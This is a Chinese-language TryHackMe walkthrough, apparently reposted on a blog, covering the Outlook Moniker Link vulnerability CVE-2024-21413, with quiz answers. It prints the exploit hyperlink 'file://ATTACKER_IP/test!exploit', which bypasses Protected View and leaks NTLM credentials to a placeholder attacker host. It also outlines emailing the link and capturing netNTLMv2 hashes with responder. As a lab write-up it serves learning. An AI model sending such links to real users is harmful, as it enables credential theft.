news 2026/9/11 22:52:21

深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深度剖析Outlook高危漏洞CVE-2024–21413:Moniker Link的利用与防御

Tryhackme — Moniker Link (CVE-2024–21413)

任务 1 — 简介
2024年2月13日,微软公布了一个Microsoft Outlook远程代码执行(RCE)及凭证泄露漏洞,分配的CVE编号为CVE-2024–21413(Moniker Link)。Check Point Research的Haifei Li被确认发现了此漏洞。

该漏洞在处理一种称为“Moniker Link”的特殊超链接时,绕过了Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。

回答以下问题:
该CVE被分配的“严重性”等级是什么?
= 严重

任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用file://类型的Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件(<a href="file://ATTACKER_IP/test">Click me</a>)。此过程使用SMB协议,该协议会使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”功能会捕获并阻止此尝试。

<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>

此处的漏洞在于,修改我们的超链接,在Moniker Link中包含!特殊字符和一些文本,从而绕过Outlook的“受保护的视图”。例如:
<a href="file://ATTACKER_IP/test!exploit">Click me</a>.

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。请注意,远程设备上并不需要实际存在该共享,因为无论如何都会尝试进行身份验证,从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。

远程代码执行是可能的,因为Moniker Link在Windows上使用了组件对象模型。不过,对此进行解释目前超出了本房间的范围,因为尚未有公开发布的通过此特定CVE实现RCE的概念验证。

回答以下问题:
我们在超链接中使用哪种Moniker Link类型?
= file://
用于绕过Outlook“受保护的视图”的特殊字符是什么?
= !

任务 3 — 利用
数据: https://tryhackme.com/room/monikerlink

概念验证:

  • 需要攻击者和受害者的电子邮件。通常,你需要使用自己的SMTP服务器(本房间已为你提供)。
  • 需要密码进行身份验证。在本房间中,attacker@monikerlink.thm的密码是attacker
  • 包含电子邮件内容 (html_content),其中包含我们作为HTML超链接的Moniker Link。
  • 然后,填写电子邮件中的“主题”、“发件人”和“收件人”字段。
  • 最后,将电子邮件发送到邮件服务器。

我们在AttackBox上用来捕获用户哈希的应用程序名称是什么?
= responder
点击电子邮件中的超链接后捕获的哈希类型是什么?
= netNTLMv2

其他任务涉及新的Outlook更新,如果不看答案,你可能无法完成房间,因此答案已在任务本身中给出。

这是我的学习总结,希望对你有帮助,别忘了关注。FINISHED
CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/4 0:52:29

【Django毕设全套源码+文档】django基于AES的文件夹加密解密系统的设计与实现(丰富项目+远程调试+讲解+定制)

博主介绍&#xff1a;✌️码农一枚 &#xff0c;专注于大学生项目实战开发、讲解和毕业&#x1f6a2;文撰写修改等。全栈领域优质创作者&#xff0c;博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围&#xff1a;&am…

作者头像 李华
网站建设 2026/9/2 10:31:38

论文写不动?AI论文平台 千笔ai写作 VS 万方智搜AI,MBA专属高效工具!

随着人工智能技术的迅猛迭代与普及&#xff0c;AI辅助写作工具已逐步渗透到高校学术写作场景中&#xff0c;成为专科生、本科生、研究生完成毕业论文不可或缺的辅助手段。越来越多面临毕业论文压力的学生&#xff0c;开始依赖各类AI工具简化写作流程、提升创作效率。但与此同时…

作者头像 李华
网站建设 2026/9/10 11:57:23

期货套保系统指标监控面板设计与应用

指标监控面板是交易决策的重要支撑工具。通过实时展示关键交易指标&#xff0c;交易员能够快速把握市场状态与账户状况&#xff0c;提升决策效率。本文将详细介绍期货套保系统中指标监控面板的设计思路与功能实现。 一、指标监控面板的价值定位 指标监控面板&#xff08;Metr…

作者头像 李华
网站建设 2026/9/8 18:15:47

数字化套期保值解决方案数据一致性验证机制

数据一致性是期现业务系统可靠性的基础保障。多系统协同、频繁数据变更与复杂计算逻辑都可能导致数据不一致。本文将详细介绍数字化套期保值解决方案中的数据一致性验证机制&#xff0c;帮助企业建立可靠的数据质量保障体系。 一、数据一致性验证的价值 数据一致性验证&#…

作者头像 李华
网站建设 2026/9/9 11:13:33

输入停车场各区域实时车位,引导车辆驶向空闲最多的区域。

1️⃣ 实际应用场景描述 & 痛点引入在大型商场、写字楼或智能工厂的停车场中&#xff0c;车位分布在不同区域&#xff08;A区、B区、C区等&#xff09;。传统停车场缺乏实时引导&#xff0c;导致&#xff1a;- 车辆集中涌入某个区域&#xff0c;其他区域空闲。- 寻找车位时…

作者头像 李华
网站建设 2026/9/9 11:13:51

电气铁路柔性过分相:从供电臂a到供电臂b的换相之旅

电气铁路柔性过分相 60 从供电臂a到供电臂b 换相波形稳定 带文献在电气化铁路的世界里&#xff0c;列车的供电系统是一个复杂而精密的系统。列车在高速运行时&#xff0c;供电臂之间的切换必须平滑&#xff0c;否则可能会导致供电中断&#xff0c;甚至引发安全事故。今天&#…

作者头像 李华